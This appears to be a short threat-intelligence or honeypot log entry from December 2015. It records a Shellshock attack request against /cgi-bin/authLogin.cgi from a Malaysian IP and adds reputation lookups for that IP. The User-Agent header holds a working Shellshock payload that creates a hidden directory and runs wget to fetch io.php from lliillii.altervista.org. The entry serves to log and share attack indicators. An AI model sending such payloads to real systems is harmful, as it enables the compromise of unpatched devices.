Samstag, 5. Dezember 2015

1.32.103.224 . Shellschock Download via http://lliillii.altervista.org

BEGIN OF HTTP DATA:
2015-12-05 02:52:29
Source IP: 1.32.103.224
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

 END OF DATA
The server was not responding to my manually download try.

1.32.103[.]224

    Static Source: GeoIP data
  • Country: Malaysia
  • ASN: AS4788 TM Net, Internet Service Provider
    Dynamic Source: IBM X-Force Exchange
  • Score: 7.1
  • Reference: https://exchange.xforce.ibmcloud.com/ip/1.32.103.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/1.32.103.224